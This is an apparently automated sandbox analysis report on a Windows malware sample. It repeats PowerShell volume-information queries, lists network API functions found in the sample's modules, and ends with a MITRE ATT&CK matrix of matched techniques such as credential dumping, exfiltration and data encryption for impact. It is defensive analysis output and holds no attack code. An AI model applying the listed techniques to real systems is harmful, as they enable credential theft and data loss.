    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127742F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7127742F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90B2860 GetUserNameA,GetLastError,_strdup,55_2_00007FF8B90B2860
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,5_2_00007FF8A934B3F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9351EA6 calloc,calloc,calloc,bind,WSAGetLastError,5_2_00007FF8A9351EA6
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A931EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,5_2_00007FF8A931EFC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9352130 calloc,calloc,calloc,bind,WSAGetLastError,5_2_00007FF8A9352130
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9307410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,5_2_00007FF8A9307410
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B915B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,55_2_00007FF8B915B3F0

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Valid Accounts    		1
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Disable or Modify Tools    		OS Credential Dumping11
    System Time Discovery    		1
    Exploitation of Remote Services    		12
    Archive Collected Data    		2
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts112
    Command and Scripting Interpreter    		1
    Valid Accounts    		1
    Valid Accounts    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory1
    Account Discovery    		Remote Desktop ProtocolData from Removable Media21
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts11
    Scheduled Task/Job    		111
    Windows Service    		1
    Access Token Manipulation    		2
    Obfuscated Files or Information    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Service Execution    		11
    Scheduled Task/Job    		111
    Windows Service    		1
    Software Packing    		NTDS32
    System Information Discovery    		Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud Accounts1
    PowerShell    		1
    Registry Run Keys / Startup Folder    		11
    Process Injection    		1
    DLL Side-Loading    		LSA Secrets221
    Security Software Discovery    		SSHKeylogging3
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
    Scheduled Task/Job    		11
    File Deletion    		Cached Domain Credentials1
    Process Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
    Registry Run Keys / Startup Folder    		121
    Masquerading    		DCSync121
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Valid Accounts    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Modify Registry    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Access Token Manipulation    		Network Sniffing1
    System Network Configuration Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd121
    Virtualization/Sandbox Evasion    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
    Process Injection    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

    Behavior Graph

    Hide Legend

